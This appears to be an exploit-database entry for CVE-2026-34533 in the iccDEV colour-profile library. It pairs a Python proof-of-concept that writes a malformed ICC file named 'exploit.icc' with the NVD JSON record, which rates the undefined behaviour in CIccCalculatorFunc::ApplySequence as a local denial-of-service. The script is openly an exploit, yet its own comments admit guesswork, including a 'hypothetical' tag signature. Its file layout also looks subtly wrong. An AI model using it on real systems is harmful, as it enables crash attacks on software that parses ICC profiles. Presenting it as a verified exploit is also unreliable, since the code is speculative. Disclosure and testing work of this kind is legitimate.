CVE-2026-34533

import struct # This script generates a malformed ICC profile to trigger the Undefined Behavior in iccDEV < 2.3.1.6. # The vulnerability occurs in CIccCalculatorFunc::ApplySequence() due to invalid enum values. def generate_malformed_icc(filename): # ICC profile header (simplified) # Profile size: 128 bytes (placeholder) # Preferred CMM type: 0x00000000 # Profile version: 0x04000000 (v2.4) # Profile/device class: 'scnr' (Input device) # Color space: 'RGB ' # PCS: 'XYZ ' # Date: [0]*12 # Magic: 'acsp' # Platform: 0x00000000 # Flags: 0x00000000 # Manufacturer: 0x00000000 # Model: 0x00000000 # Attributes: 0x00000000 0x00000000 # Rendering intent: 0x00000000 # PCS illuminant: XYZ (0.9642, 1.0, 0.8249) # Creator: 0x00000000 # Profile ID: [0]*16 header = b'' header += struct.pack('>I', 128) # Size header += struct.pack('>I', 0) # CMM header += struct.pack('>I', 0x04000000) # Version header += b'scnr' # Class header += b'RGB ' # Color Space header += b'XYZ ' # PCS header += b'\x00' * 12 # Date header += b'acsp' # Magic header += struct.pack('>I', 0) # Platform header += struct.pack('>I', 0) # Flags header += struct.pack('>I', 0) # Manufacturer header += struct.pack('>I', 0) # Model header += struct.pack('>I', 0) # Attributes (high) header += struct.pack('>I', 0) # Attributes (low) header += struct.pack('>I', 0) # Rendering Intent # XYZ illuminant (D50) header += struct.pack('>i', 0x0000f6d6) # X header += struct.pack('>i', 0x00010000) # Y header += struct.pack('>i', 0x0000d32d) # Z header += struct.pack('>I', 0) # Creator header += b'\x00' * 16 # Profile ID header += b'\x00' * 28 # Reserved # Tag Table # We need a tag that triggers the calculator function sequence. # Let's assume a 'curv' or similar tag type processing is involved or we inject a malformed tag. # The specific tag type triggering CIccCalculatorFunc is implementation specific, # but typically involves processing curves orlut types. # Here we inject a tag with a signature that might be processed by the vulnerable function. tag_count = 1 tag_table = b'' tag_signature = b'mfsA' # Hypothetical tag signature processed by calculator tag_offset = 128 + 12 * tag_count # Header starts at 0, table starts at 128 (usually) tag_size = 20 tag_table += tag_signature tag_table += struct.pack('>I', tag_offset) tag_table += struct.pack('>I', tag_size) # Tag Data # This data contains the invalid enum value for icChannelFuncSignature # The vulnerability description mentions "invalid enum values". # We will write garbage data to simulate the invalid value. tag_data = b'' # First 4 bytes might be the type/enum tag_data += struct.pack('>I', 0xDEADBEEF) # Invalid Enum Value tag_data += b'A' * (tag_size - 4) # Padding # Combine all profile = header + tag_table + tag_data # Update header size profile = struct.pack('>I', len(profile)) + profile[4:] with open(filename, 'wb') as f: f.write(profile) print(f"Malformed ICC profile generated: {filename}") if __name__ == "__main__": generate_malformed_icc("exploit.icc")

{"cve": {"id": "CVE-2026-34533", "sourceIdentifier": "[email protected]", "published": "2026-03-31T22:16:20.637", "lastModified": "2026-04-20T13:48:48.657", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "iccDEV provides a set of libraries and tools for working with ICC color management profiles. Prior to version 2.3.1.6, a crafted ICC profile can trigger Undefined Behavior (UB) in CIccCalculatorFunc::ApplySequence() due to invalid enum values being loaded for icChannelFuncSignature. The issue is observable under UBSan as a “load of value … not a valid value for type icChannelFuncSignature”, indicating a type/enum value confusion scenario during ICC profile processing. This issue has been patched in version 2.3.1.6."}, {"lang": "es", "value": "iccDEV proporciona un conjunto de bibliotecas y herramientas para trabajar con perfiles de gestión de color ICC. Antes de la versión 2.3.1.6, un perfil ICC manipulado puede desencadenar Comportamiento Indefinido (UB) en CIccCalculatorFunc::ApplySequence() debido a la carga de valores de enumeración (enum) no válidos para icChannelFuncSignature. El problema es observable bajo UBSan como una 'carga de valor... no es un valor válido para el tipo icChannelFuncSignature', lo que indica un escenario de confusión de valores de tipo/enumeración (enum) durante el procesamiento de perfiles ICC. Este problema ha sido parcheado en la versión 2.3.1.6."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.2, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 3.6}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-758"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:color:iccdev:*:*:*:*:*:*:*:*", "versionEndExcluding": "2.3.1.6", "matchCriteriaId": "DE133F29-9592-4669-8B76-9F7C88EFE17D"}]}]}], "references": [{"url": "https://github.com/InternationalColorConsortium/iccDEV/issues/664", "source": "[email protected]", "tags": ["Issue Tracking", "Exploit"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/pull/681", "source": "[email protected]", "tags": ["Issue Tracking", "Patch"]}, {"url": "https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-8jj3-77m7-c3pq", "source": "[email protected]", "tags": ["Patch", "Vendor Advisory"]}]}}